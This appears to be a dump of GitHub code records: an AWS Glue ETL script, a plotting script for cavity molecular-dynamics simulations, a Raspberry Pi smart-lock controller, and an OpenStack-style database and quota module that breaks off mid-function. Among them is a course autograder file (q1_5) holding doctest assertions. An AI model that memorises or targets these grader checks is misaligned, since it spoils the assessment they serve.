transformation_ctx=\"step_trainer_landing_node1684277885644\",\n)\n\n# Script generated for node customer_trusted_data\ncustomer_trusted_data_node1684277965513 = glueContext.create_dynamic_frame.from_options(\n format_options={\"multiline\": False},\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"paths\": [\"s3://renee-stedi-project-lakehouse/customer_trusted_zone/\"],\n \"recurse\": True,\n },\n transformation_ctx=\"customer_trusted_data_node1684277965513\",\n)\n\n# Script generated for node JoinOnTimestamp\nJoinOnTimestamp_node1684278045681 = Join.apply(\n frame1=accelerometer_trusted_node1,\n frame2=step_trainer_landing_node1684277885644,\n keys1=[\"timeStamp\"],\n keys2=[\"sensorReadingTime\"],\n transformation_ctx=\"JoinOnTimestamp_node1684278045681\",\n)\n\n# Script generated for node JoinOnCustomer\nJoinOnCustomer_node1684278126915 = Join.apply(\n frame1=customer_trusted_data_node1684277965513,\n frame2=JoinOnTimestamp_node1684278045681,\n keys1=[\"email\"],\n keys2=[\"user\"],\n transformation_ctx=\"JoinOnCustomer_node1684278126915\",\n)\n\n# Script generated for node machine_learning_curated\nmachine_learning_curated_node3 = glueContext.write_dynamic_frame.from_options(\n frame=JoinOnCustomer_node1684278126915,\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"path\": \"s3://renee-stedi-project-lakehouse/machine_learning_curated/\",\n \"partitionKeys\": [],\n },\n transformation_ctx=\"machine_learning_curated_node3\",\n)\n\njob.commit()\n","repo_name":"WhiskersReneeWe/de-glue","sub_path":"machine_learning_curated.py","file_name":"machine_learning_curated.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18635637629","text":"import numpy as np\nimport columnplots as clp\nfrom scipy import signal\nimport os, sys, time\nimport math\nfrom itertools import islice\nfrom scipy import fftpack\nimport glob\nimport json\n\n\ndef obtain_avg_data(path, pattern=\"simu_*.vac.txt\"):\n filenames = glob.glob(\"%s/%s\" %(path, pattern))\n print(\"Averaging over %d trajectories\" %(len(filenames)))\n data = np.loadtxt(filenames[0])\n for filename in filenames[1:]:\n data += np.loadtxt(filename)\n data /= float(len(filenames))\n return data\n\ndef gather_IR_data(paths):\n freqs, sps = [], []\n for path in paths:\n data = obtain_avg_data(path=path, pattern=\"simu_*.dac.txt\")\n freq, sp = data[:,5], (data[:,6] + data[:,7])/2e28\n freqs.append(freq)\n sps.append(sp)\n return freqs, sps\n\ndef gather_relaxation_trajectory(paths, opposite=False):\n ts, trajs = [], []\n if opposite:\n pattern = \"simu_*.VCO_summed_td_oppo.txt\"\n else:\n pattern = \"simu_*.VCO_summed_td.txt\"\n for path in paths:\n data = obtain_avg_data(path=path, pattern=pattern)\n t, traj = data[1:,0], data[1:, 1]\n ts.append(t*1e-3) # fs to ps\n if opposite:\n trajs.append(traj / 206.0 - 0.000950037)\n else:\n trajs.append(traj / 10.0 - 0.000950037) # averaged over 10 molecules and minus 300K in a.u.\n return ts, trajs\n\ndef prepare_ph_data(path=\"pumping_Rabi/E0_2e-4_Exc_UP_Amp_6e-3\", omega=2320, pattern=\"simu_*.ph*\", dtfs=2):\n filenames = glob.glob(\"%s/%s\" %(path, pattern))\n N = len(filenames)\n print(\"reading %s with %d files\" %(path, N))\n size = np.size(np.loadtxt(filenames[0])[:,0])\n t, phx, phy = np.zeros(size), np.zeros(size), np.zeros(size)\n ph2au = 0.5 * 1.8897259885789**2 * omega**2 * 0.0000045563352812122295**2\n vph2au = 0.5 * 1.8897259885789**2 / 41.341374575751**2\n for filename in filenames:\n data = np.loadtxt(filename)\n t_loc, qx_loc, qy_loc = data[:,0], data[:,1], data[:,2]\n vx_loc = np.gradient(qx_loc, dtfs, axis=-1, edge_order=2)\n vy_loc = np.gradient(qy_loc, dtfs, axis=-1, edge_order=2)\n t += t_loc\n phx += qx_loc**2 * ph2au + vx_loc**2 * vph2au\n phy += qy_loc**2 * ph2au + vy_loc**2 * vph2au\n return t[1:-2]/N, (phx[1:-2] + phy[1:-2])/N\n\npaths_IR = [\"co2_eq/E0_0e-4/\", \"co2_eq/E0_2e-4/\"]\npaths_VR = [\"try_VER_abe/Exc_10_E0_0e-4/\", \"try_VER_abe/Exc_10_E0_2e-4/\"]\n\ndef plot_results():\n freqs, sps = gather_IR_data(paths=paths_IR)\n ts, trajs = gather_relaxation_trajectory(paths=paths_VR)\n ts2, trajs2 = gather_relaxation_trajectory(paths=paths_VR, opposite=True)\n # photonic energy\n t, ph = prepare_ph_data(path=paths_VR[1])\n ph -= 0.000950037 * 2.0 # reduce the thermal energy\n\n # convert all atomic energies to hbar*omega_c, where omega_c = 2320.0 cm-1\n au2omega_c = 219474.63 / 2320.0\n trajs = [x*au2omega_c for x in trajs]\n trajs2= [x*au2omega_c for x in trajs2]\n ph *= au2omega_c\n\n colors = [\"k\", \"r\"]\n labels = [\"outside cavity\", \"inside cavity\"]\n axes = clp.initialize(1, 4, width=12.0, height=4.*0.618, LaTeX=True, fontsize=12, labelthem=True, labelthemPosition=[0.15, 0.95])\n sps[1] += 1.5 # inverse the outside cavity lineshape\n clp.plotone(freqs, sps, axes[0], xlim=[2000, 2600], xlabel=\"frequency [cm$^{-1}$]\",\n ylabel=\"$n(\\omega)\\\\alpha(\\omega)$ [arb. units]\", colors=colors, labels=labels, showlegend=False, ylim=[-0.3, 4])\n clp.plotone(ts, trajs, axes[1], xlim=[-0.5, 40], ylim=[0, 0.03*au2omega_c], ylabel=\"V(C=O) - $k_B$T [$\\hbar\\omega_c$]\",\n xlabel=\"time [ps]\", colors=colors, labels=labels, lw=1.2, showlegend=False)\n clp.plotone(ts2, trajs2, axes[2], xlim=[-0.5, 40], ylim=[0, 0.001*au2omega_c], ylabel=\"V(C=O) - $k_B$T [$\\hbar\\omega_c$]\",\n xlabel=\"time [ps]\", colors=colors, labels=labels, showlegend=False, lw=1.2)\n clp.plotone([t[1::10]*1e-3], [ph[1::10]], axes[3], colors=[\"r\"], showlegend=False, xlim=[-0.5,40],\n ylabel=\"$E_{ph}$ - 2$k_B$T [$\\hbar\\omega_c$]\", xlabel=\"time [ps]\", ylim=[0, 0.006*au2omega_c], lw=1.2)\n\n axes[0].text(2010, 0.1, \"cavity off\", fontsize=12, color=\"k\")\n axes[0].text(2010, 1.6, \"cavity on\", fontsize=12, color=\"r\")\n axes[1].text(0.5, 0.8, \"hot molecules\", transform=axes[1].transAxes, fontsize=12, color=\"b\")\n axes[2].text(0.4, 0.1, \"thermal molecules\", transform=axes[2].transAxes, fontsize=12, color=\"b\")\n axes[3].text(0.4, 0.8, \"cavity photons\", transform=axes[3].transAxes, fontsize=12, color=\"b\")\n axes[0].axvline(x = 2320, ymin=0.0, ymax=3.0, ls='--', c=\"b\")\n\n clp.adjust(tight_layout=True, savefile=\"cavity_effect.pdf\")\n\n\nif __name__ == \"__main__\":\n plot_results()\n","repo_name":"TaoELi/cavmd_examples_co2","sub_path":"CO2_vib_relaxation/plot_cavity_effect.py","file_name":"plot_cavity_effect.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33649993670","text":"test = { 'name': 'q1_5',\n 'points': 3,\n 'suites': [ { 'cases': [ { 'code': '>>> # Hint: make sure the returned table has the labls:;\\n'\n \">>> # 'Year' and 'Children per woman';\\n\"\n \">>> assert fertility_over_time('usa', 2010).labels == ('Year', 'Children per woman')\\n\",\n 'hidden': False,\n 'locked': False},\n {'code': \">>> assert all(fertility_over_time('usa', 2010).column('Year') == np.arange(2010, 2016))\\n\", 'hidden': False, 'locked': False},\n {'code': \">>> assert all(fertility_over_time('usa', 2005).column('Year') == np.arange(2005, 2016))\\n\", 'hidden': False, 'locked': False}],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'}]}\n","repo_name":"alcullinen/materials-f20","sub_path":"projects/project1/tests/q1_5.py","file_name":"q1_5.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86724850584","text":"import pi_camera\nimport contract\nimport lock_control\nimport json\nimport signal\nfrom time import sleep\n\n\nwhile True:\n try:\n codes = pi_camera.capture_img()\n args = json.loads(codes, encoding='utf8')\n\n print('check can open door, args: %s' % codes)\n if contract.can_open_door(args):\n print('open door ...')\n lock_control.open_lock()\n sleep(3)\n else:\n print('no premission ...')\n except KeyboardInterrupt:\n print('Good bye')\n exit(0)\n except Exception as ex:\n print('some error ...')\n print(ex)\n","repo_name":"tw-bc-group/decentralized-smart-lock","sub_path":"LockController/pi_control.py","file_name":"pi_control.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"21839085932","text":"import functools\nimport sqlalchemy as sql\nimport time\nimport uuid\n\nfrom oslo_config import cfg\nfrom oslo_db import exception as db_exc\nfrom oslo_log import log as logging\nfrom oslo_utils import timeutils\nfrom oslo_utils import uuidutils\nfrom sqlalchemy import or_, and_\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy.sql.expression import literal_column\n\nfrom newcloudo2o.common import constants\nfrom newcloudo2o.common.context import is_admin_context as _is_admin_context\nfrom newcloudo2o.common import exceptions\nfrom newcloudo2o.common.i18n import _\nfrom newcloudo2o.common.i18n import _LW\n\nfrom newcloudo2o.db import core\nfrom newcloudo2o.db import models\n\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\n\ndef create_pod(context, pod_dict):\n with context.session.begin():\n return core.create_resource(context, models.Pod, pod_dict)\n\n\ndef delete_pod(context, pod_id):\n with context.session.begin():\n return core.delete_resource(context, models.Pod, pod_id)\n\n\ndef get_pod(context, pod_id):\n with context.session.begin():\n return core.get_resource(context, models.Pod, pod_id)\n\n\ndef list_pods(context, filters=None, sorts=None):\n with context.session.begin():\n return core.query_resource(context, models.Pod, filters or [],\n sorts or [])\n\n\ndef update_pod(context, pod_id, update_dict):\n with context.session.begin():\n return core.update_resource(context, models.Pod, pod_id, update_dict)\n\n\ndef create_pod_service_configuration(context, config_dict):\n with context.session.begin():\n return core.create_resource(context, models.PodServiceConfiguration,\n config_dict)\n\n\ndef delete_pod_service_configuration(context, config_id):\n with context.session.begin():\n return core.delete_resource(context, models.PodServiceConfiguration,\n config_id)\n\n\ndef get_pod_service_configuration(context, config_id):\n with context.session.begin():\n return core.get_resource(context, models.PodServiceConfiguration,\n config_id)\n\n\ndef list_pod_service_configurations(context, filters=None, sorts=None):\n with context.session.begin():\n return core.query_resource(context, models.PodServiceConfiguration,\n filters or [], sorts or [])\n\n\ndef update_pod_service_configuration(context, config_id, update_dict):\n with context.session.begin():\n return core.update_resource(\n context, models.PodServiceConfiguration, config_id, update_dict)\n\n\ndef get_bottom_mappings_by_top_id(context, top_id, resource_type):\n \"\"\"Get resource id and pod name on bottom\n\n :param context: context object\n :param top_id: resource id on top\n :param resource_type: resource type\n :return: a list of tuple (pod dict, bottom_id)\n \"\"\"\n route_filters = [{'key': 'top_id', 'comparator': 'eq', 'value': top_id},\n {'key': 'resource_type',\n 'comparator': 'eq',\n 'value': resource_type}]\n mappings = []\n with context.session.begin():\n routes = core.query_resource(\n context, models.ResourceRouting, route_filters, [])\n for route in routes:\n if not route['bottom_id']:\n continue\n pod = core.get_resource(context, models.Pod, route['pod_id'])\n mappings.append((pod, route['bottom_id']))\n return mappings\n\n\ndef get_bottom_id_by_top_id_pod_name(context, top_id, pod_name, resource_type):\n \"\"\"Get resource bottom id by top id and bottom pod name\n\n :param context: context object\n :param top_id: resource id on top\n :param pod_name: name of bottom pod\n :param resource_type: resource type\n :return:\n \"\"\"\n mappings = get_bottom_mappings_by_top_id(context, top_id, resource_type)\n for pod, bottom_id in mappings:\n if pod['pod_name'] == pod_name:\n return bottom_id\n return None\n\n\ndef get_bottom_mappings_by_tenant_pod(context,\n tenant_id,\n pod_id,\n resource_type):\n \"\"\"Get resource routing for specific tenant and pod\n\n :param context: context object\n :param tenant_id: tenant id to look up\n :param pod_id: pod to look up\n :param resource_type: specific resource\n :return: a dic {top_id : route}\n \"\"\"\n route_filters = [{'key': 'pod_id',\n 'comparator': 'eq',\n 'value': pod_id},\n {'key': 'project_id',\n 'comparator': 'eq',\n 'value': tenant_id},\n {'key': 'resource_type',\n 'comparator': 'eq',\n 'value': resource_type}]\n routings = {}\n with context.session.begin():\n routes = core.query_resource(\n context, models.ResourceRouting, route_filters, [])\n for _route in routes:\n if not _route['bottom_id']:\n continue\n routings[_route['top_id']] = _route\n return routings\n\n\ndef get_next_bottom_pod(context, current_pod_id=None):\n pods = list_pods(context, sorts=[(models.Pod.pod_id, True)])\n # NOTE(zhiyuan) number of pods is small, just traverse to filter top pod\n pods = [pod for pod in pods if pod['az_name']]\n for index, pod in enumerate(pods):\n if not current_pod_id:\n return pod\n if pod['pod_id'] == current_pod_id and index < len(pods) - 1:\n return pods[index + 1]\n return None\n\n\ndef get_top_pod(context):\n\n filters = [{'key': 'az_name', 'comparator': 'eq', 'value': ''}]\n pods = list_pods(context, filters=filters)\n\n # only one should be searched\n for pod in pods:\n if (pod['pod_name'] != '') and \\\n (pod['az_name'] == ''):\n return pod\n\n return None\n\n\ndef get_pod_by_name(context, pod_name):\n\n filters = [{'key': 'pod_name', 'comparator': 'eq', 'value': pod_name}]\n pods = list_pods(context, filters=filters)\n\n # only one should be searched\n for pod in pods:\n if pod['pod_name'] == pod_name:\n return pod\n\n return None\n\n\ndef new_job(context, _type, resource_id):\n with context.session.begin():\n job_dict = {'id': uuidutils.generate_uuid(),\n 'type': _type,\n 'status': constants.JS_New,\n 'resource_id': resource_id,\n 'extra_id': uuidutils.generate_uuid()}\n job = core.create_resource(context, models.Job, job_dict)\n return job\n\n\ndef register_job(context, _type, resource_id):\n try:\n context.session.begin()\n job_dict = {'id': uuidutils.generate_uuid(),\n 'type': _type,\n 'status': constants.JS_Running,\n 'resource_id': resource_id,\n 'extra_id': constants.SP_EXTRA_ID}\n job = core.create_resource(context, models.Job, job_dict)\n context.session.commit()\n return job\n except db_exc.DBDuplicateEntry:\n context.session.rollback()\n return None\n except db_exc.DBDeadlock:\n context.session.rollback()\n return None\n finally:\n context.session.close()\n\n\ndef get_latest_failed_jobs(context):\n jobs = []\n query = context.session.query(models.Job.type, models.Job.resource_id,\n sql.func.count(models.Job.id))\n query = query.group_by(models.Job.type, models.Job.resource_id)\n for job_type, resource_id, count in query:\n _query = context.session.query(models.Job)\n _query = _query.filter_by(type=job_type, resource_id=resource_id)\n _query = _query.order_by(sql.desc('timestamp'))\n # when timestamps of job entries are the same, sort entries by status\n # so \"Fail\" job is placed before \"New\" and \"Success\" jobs\n _query = _query.order_by(sql.asc('status'))\n latest_job = _query[0].to_dict()\n if latest_job['status'] == constants.JS_Fail:\n jobs.append(latest_job)\n return jobs\n\n\ndef get_latest_timestamp(context, status, _type, resource_id):\n jobs = core.query_resource(\n context, models.Job,\n [{'key': 'status', 'comparator': 'eq', 'value': status},\n {'key': 'type', 'comparator': 'eq', 'value': _type},\n {'key': 'resource_id', 'comparator': 'eq', 'value': resource_id}],\n [('timestamp', False)])\n if jobs:\n return jobs[0]['timestamp']\n else:\n return None\n\n\ndef get_running_job(context, _type, resource_id):\n jobs = core.query_resource(\n context, models.Job,\n [{'key': 'resource_id', 'comparator': 'eq', 'value': resource_id},\n {'key': 'status', 'comparator': 'eq', 'value': constants.JS_Running},\n {'key': 'type', 'comparator': 'eq', 'value': _type}], [])\n if jobs:\n return jobs[0]\n else:\n return None\n\n\ndef finish_job(context, job_id, successful, timestamp):\n status = constants.JS_Success if successful else constants.JS_Fail\n with context.session.begin():\n job_dict = {'status': status,\n 'timestamp': timestamp,\n 'extra_id': uuidutils.generate_uuid()}\n core.update_resource(context, models.Job, job_id, job_dict)\n\n\n_DEFAULT_QUOTA_NAME = 'default'\n\n\ndef _is_user_context(context):\n \"\"\"Indicates if the request context is a normal user.\"\"\"\n if not context:\n return False\n if context.is_admin:\n return False\n if not context.user_id or not context.project_id:\n return False\n return True\n\n\ndef authorize_quota_class_context(context, class_name):\n \"\"\"Ensures a request has permission to access the given quota class.\"\"\"\n if _is_user_context(context):\n if not context.quota_class:\n raise exceptions.NotAuthorized()\n elif context.quota_class != class_name:\n raise exceptions.NotAuthorized()\n\n\ndef authorize_project_context(context, project_id):\n \"\"\"Ensures a request has permission to access the given project.\"\"\"\n if _is_user_context(context):\n if not context.project_id:\n raise exceptions.NotAuthorized()\n elif context.project_id != project_id:\n raise exceptions.NotAuthorized()\n\n\ndef authorize_user_context(context, user_id):\n \"\"\"Ensures a request has permission to access the given user.\"\"\"\n if _is_user_context(context):\n if not context.user_id:\n raise exceptions.NotAuthorized()\n elif context.user_id != user_id:\n raise exceptions.NotAuthorized()\n\n\ndef require_admin_context(f):\n \"\"\"Decorator to require admin request context.\n\n The first argument to the wrapped function must be the context.\n\n \"\"\"\n\n def wrapper(*args, **kwargs):\n if not _is_admin_context(args[0]):\n raise exceptions.AdminRequired()\n return f(*args, **kwargs)\n return wrapper\n\n\ndef require_context(f):\n \"\"\"Decorator to require *any* user or admin context.\n\n This does no authorization for user or project access matching, see\n :py:func:`authorize_project_context` and\n :py:func:`authorize_user_context`.\n\n The first argument to the wrapped function must be the context.\n\n \"\"\"\n\n def wrapper(*args, **kwargs):\n if not _is_admin_context(args[0]) and not _is_user_context(args[0]):\n raise exceptions.NotAuthorized()\n return f(*args, **kwargs)\n return wrapper\n\n\ndef _retry_on_deadlock(f):\n \"\"\"Decorator to retry a DB API call if Deadlock was received.\"\"\"\n @functools.wraps(f)\n def wrapped(*args, **kwargs):\n while True:\n try:\n return f(*args, **kwargs)\n except db_exc.DBDeadlock:\n LOG.warning(_LW(\"Deadlock detected when running \"\n \"'%(func_name)s': Retrying...\"),\n dict(func_name=f.__name__))\n # Retry!\n time.sleep(0.5)\n continue\n functools.update_wrapper(wrapped, f)\n return wrapped\n\n\ndef handle_db_data_error(f):\n def wrapper(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except db_exc.DBDataError:\n msg = _('Error writing field to database')\n LOG.exception(msg)\n raise exceptions.Invalid(msg)\n except Exception as e:\n LOG.exception(str(e))\n raise\n\n return wrapper\n\n\ndef model_query(context, *args, **kwargs):\n \"\"\"Query helper that accounts for context's `read_deleted` field.\n\n :param context: context to query under\n :param session: if present, the session to use\n :param read_deleted: if present, overrides context's read_deleted field.\n :param project_only: if present and context is user-type, then restrict\n query to match the context's project_id.\n \"\"\"\n session = kwargs.get('session') or context.session\n read_deleted = kwargs.get('read_deleted') or context.read_deleted\n project_only = kwargs.get('project_only')\n\n query = session.query(*args)\n\n if read_deleted == 'no':\n query = query.filter_by(deleted=False)\n elif read_deleted == 'yes':\n pass # omit the filter to include deleted and active\n elif read_deleted == 'only':\n query = query.filter_by(deleted=True)\n elif read_deleted == 'int_no':\n query = query.filter_by(deleted=0)\n else:\n raise Exception(\n _(\"Unrecognized read_deleted value '%s'\") % read_deleted)\n\n if project_only and _is_user_context(context):\n query = query.filter_by(project_id=context.project_id)\n\n return query\n\n\n@require_context\ndef _quota_get(context, project_id, resource, session=None):\n result = model_query(context, models.Quotas, session=session,\n read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n filter_by(resource=resource).\\\n first()\n\n if not result:\n raise exceptions.ProjectQuotaNotFound(project_id=project_id)\n\n return result\n\n\n@require_context\ndef quota_get(context, project_id, resource):\n return _quota_get(context, project_id, resource)\n\n\n@require_context\ndef quota_get_all_by_project(context, project_id):\n authorize_project_context(context, project_id)\n\n rows = model_query(context, models.Quotas, read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n result = {'project_id': project_id}\n for row in rows:\n result[row.resource] = row.hard_limit\n\n return result\n\n\n@require_context\ndef quota_allocated_get_all_by_project(context, project_id):\n rows = model_query(context, models.Quotas, read_deleted='no').filter_by(\n project_id=project_id).all()\n result = {'project_id': project_id}\n for row in rows:\n result[row.resource] = row.allocated\n return result\n\n\n@require_admin_context\ndef quota_create(context, project_id, resource, limit, allocated=0):\n quota_ref = models.Quotas()\n quota_ref.project_id = project_id\n quota_ref.resource = resource\n quota_ref.hard_limit = limit\n if allocated:\n quota_ref.allocated = allocated\n\n session = core.get_session()\n with session.begin():\n quota_ref.save(session)\n return quota_ref\n\n\n@require_admin_context\ndef quota_update(context, project_id, resource, limit):\n with context.session.begin():\n quota_ref = _quota_get(context, project_id, resource,\n session=context.session)\n quota_ref.hard_limit = limit\n return quota_ref\n\n\n@require_admin_context\ndef quota_allocated_update(context, project_id, resource, allocated):\n with context.session.begin():\n quota_ref = _quota_get(context, project_id, resource,\n session=context.session)\n quota_ref.allocated = allocated\n return quota_ref\n\n\n@require_admin_context\ndef quota_destroy(context, project_id, resource):\n with context.session.begin():\n quota_ref = _quota_get(context, project_id, resource,\n session=context.session)\n quota_ref.delete(session=context.session)\n\n\n@require_context\ndef _quota_class_get(context, class_name, resource, session=None):\n result = model_query(context, models.QuotaClasses, session=session,\n read_deleted=\"no\").\\\n filter_by(class_name=class_name).\\\n filter_by(resource=resource).\\\n first()\n\n if not result:\n raise exceptions.QuotaClassNotFound(class_name=class_name)\n\n return result\n\n\n@require_context\ndef quota_class_get(context, class_name, resource):\n return _quota_class_get(context, class_name, resource)\n\n\ndef quota_class_get_default(context):\n rows = model_query(context, models.QuotaClasses,\n read_deleted=\"no\").\\\n filter_by(class_name=_DEFAULT_QUOTA_NAME).all()\n\n result = {'class_name': _DEFAULT_QUOTA_NAME}\n for row in rows:\n result[row.resource] = row.hard_limit\n\n return result\n\n\n@require_context\ndef quota_class_get_all_by_name(context, class_name):\n authorize_quota_class_context(context, class_name)\n\n rows = model_query(context, models.QuotaClasses, read_deleted=\"no\").\\\n filter_by(class_name=class_name).\\\n all()\n\n result = {'class_name': class_name}\n for row in rows:\n result[row.resource] = row.hard_limit\n\n return result\n\n\n@require_admin_context\ndef quota_class_create(context, class_name, resource, limit):\n quota_class_ref = models.QuotaClasses()\n quota_class_ref.class_name = class_name\n quota_class_ref.resource = resource\n quota_class_ref.hard_limit = limit\n\n session = core.get_session()\n with session.begin():\n quota_class_ref.save(session)\n return quota_class_ref\n\n\n@require_admin_context\ndef quota_class_update(context, class_name, resource, limit):\n with context.session.begin():\n quota_class_ref = _quota_class_get(context, class_name, resource,\n session=context.session)\n quota_class_ref.hard_limit = limit\n\n return quota_class_ref\n\n\n@require_admin_context\ndef quota_class_destroy(context, class_name, resource):\n with context.session.begin():\n quota_class_ref = _quota_class_get(context, class_name, resource,\n session=context.session)\n quota_class_ref.delete(session=context.session)\n\n\n@require_admin_context\ndef quota_class_destroy_all_by_name(context, class_name):\n with context.session.begin():\n quota_classes = model_query(context, models.QuotaClasses,\n session=context.session,\n read_deleted=\"no\").\\\n filter_by(class_name=class_name).\\\n all()\n\n for quota_class_ref in quota_classes:\n quota_class_ref.delete(session=context.session)\n\n\n@require_context\ndef quota_usage_get(context, project_id, resource):\n result = model_query(context, models.QuotaUsages, read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n filter_by(resource=resource).\\\n first()\n\n if not result:\n raise exceptions.QuotaUsageNotFound(project_id=project_id)\n\n return result\n\n\n@require_context\ndef quota_usage_get_all_by_project(context, project_id):\n authorize_project_context(context, project_id)\n\n rows = model_query(context, models.QuotaUsages, read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n result = {'project_id': project_id}\n for row in rows:\n result[row.resource] = dict(in_use=row.in_use, reserved=row.reserved)\n\n return result\n\n\n@require_admin_context\ndef _quota_usage_create(context, project_id, resource, in_use, reserved,\n until_refresh, session=None):\n\n quota_usage_ref = models.QuotaUsages()\n quota_usage_ref.project_id = project_id\n quota_usage_ref.resource = resource\n quota_usage_ref.in_use = in_use\n quota_usage_ref.reserved = reserved\n quota_usage_ref.until_refresh = until_refresh\n quota_usage_ref.save(session=session)\n\n return quota_usage_ref\n\n\ndef _reservation_create(context, uuid, usage, project_id, resource, delta,\n expire, session=None):\n reservation_ref = models.Reservation()\n reservation_ref.uuid = uuid\n reservation_ref.usage_id = usage['id']\n reservation_ref.project_id = project_id\n reservation_ref.resource = resource\n reservation_ref.delta = delta\n reservation_ref.expire = expire\n reservation_ref.save(session=session)\n\n return reservation_ref\n\n\n# NOTE(johannes): The quota code uses SQL locking to ensure races don't\n# cause under or over counting of resources. To avoid deadlocks, this\n# code always acquires the lock on quota_usages before acquiring the lock\n# on reservations.\n\ndef _get_quota_usages(context, session, project_id):\n # Broken out for testability\n rows = model_query(context, models.QuotaUsages,\n read_deleted=\"no\",\n session=session).\\\n filter_by(project_id=project_id).\\\n with_lockmode('update').\\\n all()\n return {row.resource: row for row in rows}\n\n\ndef _get_quota_usages_by_resource(context, session, project_id, resource):\n # TODO(joehuang), add user_id as part of the filter\n rows = model_query(context, models.QuotaUsages,\n read_deleted=\"no\",\n session=session).\\\n filter_by(project_id=project_id).\\\n filter_by(resource=resource).\\\n with_lockmode('update').\\\n all()\n return {row.resource: row for row in rows}\n\n\n@require_context\n@_retry_on_deadlock\ndef quota_reserve(context, resources, quotas, deltas, expire,\n until_refresh, max_age, project_id=None):\n elevated = context.elevated()\n with context.session.begin():\n if project_id is None:\n project_id = context.project_id\n\n # Get the current usages\n usages = _get_quota_usages(context, context.session, project_id)\n\n # Handle usage refresh\n refresh = False\n work = set(deltas.keys())\n while work:\n resource = work.pop()\n\n # Do we need to refresh the usage?\n if resource not in usages:\n usages[resource] = _quota_usage_create(elevated,\n project_id,\n resource,\n 0, 0,\n until_refresh or None,\n session=context.session)\n refresh = True\n elif usages[resource].in_use < 0:\n # Negative in_use count indicates a desync, so try to\n # heal from that...\n refresh = True\n elif usages[resource].until_refresh is not None:\n usages[resource].until_refresh -= 1\n if usages[resource].until_refresh <= 0:\n refresh = True\n elif max_age and usages[resource].updated_at is not None and (\n (usages[resource].updated_at -\n timeutils.utcnow()).seconds >= max_age):\n refresh = True\n\n if refresh:\n # no actural usage refresh here\n\n # refresh from the bottom pod\n usages[resource].until_refresh = until_refresh or None\n\n # Because more than one resource may be refreshed\n # by the call to the sync routine, and we don't\n # want to double-sync, we make sure all refreshed\n # resources are dropped from the work set.\n work.discard(resource)\n\n # NOTE(Vek): We make the assumption that the sync\n # routine actually refreshes the\n # resources that it is the sync routine\n # for. We don't check, because this is\n # a best-effort mechanism.\n\n # Check for deltas that would go negative\n unders = [r for r, delta in deltas.items()\n if delta < 0 and delta + usages[r].in_use < 0]\n\n # Now, let's check the quotas\n # NOTE(Vek): We're only concerned about positive increments.\n # If a project has gone over quota, we want them to\n # be able to reduce their usage without any\n # problems.\n overs = [r for r, delta in deltas.items()\n if quotas[r] >= 0 and delta >= 0 and\n quotas[r] < delta + usages[r].in_use + usages[r].reserved]\n\n # NOTE(Vek): The quota check needs to be in the transaction,\n # but the transaction doesn't fail just because\n # we're over quota, so the OverQuota raise is\n # outside the transaction. If we did the raise\n # here, our usage updates would be discarded, but\n # they're not invalidated by being over-quota.\n\n # Create the reservations\n if not overs:\n reservations = []\n for resource, delta in deltas.items():\n reservation = _reservation_create(elevated,\n str(uuid.uuid4()),\n usages[resource],\n project_id,\n resource, delta, expire,\n session=context.session)\n reservations.append(reservation.uuid)\n\n # Also update the reserved quantity\n # NOTE(Vek): Again, we are only concerned here about\n # positive increments. Here, though, we're\n # worried about the following scenario:\n #\n # 1) User initiates resize down.\n # 2) User allocates a new instance.\n # 3) Resize down fails or is reverted.\n # 4) User is now over quota.\n #\n # To prevent this, we only update the\n # reserved value if the delta is positive.\n if delta > 0:\n usages[resource].reserved += delta\n\n if unders:\n LOG.warning(_LW(\"Change will make usage less than 0 for the following \"\n \"resources: %s\"), unders)\n if overs:\n usages = {k: dict(in_use=v['in_use'], reserved=v['reserved'])\n for k, v in usages.items()}\n raise exceptions.OverQuota(overs=sorted(overs), quotas=quotas,\n usages=usages)\n\n return reservations\n\n\ndef _quota_reservations(session, context, reservations):\n \"\"\"Return the relevant reservations.\"\"\"\n\n # Get the listed reservations\n return model_query(context, models.Reservation,\n read_deleted=\"no\",\n session=session).\\\n filter(models.Reservation.uuid.in_(reservations)).\\\n with_lockmode('update').\\\n all()\n\n\n@require_context\n@_retry_on_deadlock\ndef reservation_commit(context, reservations, project_id=None):\n with context.session.begin():\n usages = _get_quota_usages(context, context.session, project_id)\n\n for reservation in _quota_reservations(context.session,\n context,\n reservations):\n usage = usages[reservation.resource]\n if reservation.delta >= 0:\n usage.reserved -= reservation.delta\n usage.in_use += reservation.delta\n\n reservation.delete(session=context.session)\n\n\n@require_context\n@_retry_on_deadlock\ndef reservation_rollback(context, reservations, project_id=None):\n with context.session.begin():\n usages = _get_quota_usages(context, context.session, project_id)\n\n for reservation in _quota_reservations(context.session,\n context,\n reservations):\n usage = usages[reservation.resource]\n if reservation.delta >= 0:\n usage.reserved -= reservation.delta\n\n reservation.delete(session=context.session)\n\n\ndef quota_destroy_by_project(*args, **kwargs):\n \"\"\"Destroy all limit quotas associated with a project.\n\n Leaves usage and reservation quotas intact.\n \"\"\"\n quota_destroy_all_by_project(only_quotas=True, *args, **kwargs)\n\n\n@require_admin_context\n@_retry_on_deadlock\ndef quota_destroy_all_by_project(context, project_id, only_quotas=False):\n \"\"\"Destroy all quotas associated with a project.\n\n This includes limit quotas, usage quotas and reservation quotas.\n Optionally can only remove limit quotas and leave other types as they are.\n\n :param context: The request context, for access checks.\n :param project_id: The ID of the project being deleted.\n :param only_quotas: Only delete limit quotas, leave other types intact.\n \"\"\"\n with context.session.begin():\n quotas = model_query(context, models.Quotas, session=context.session,\n 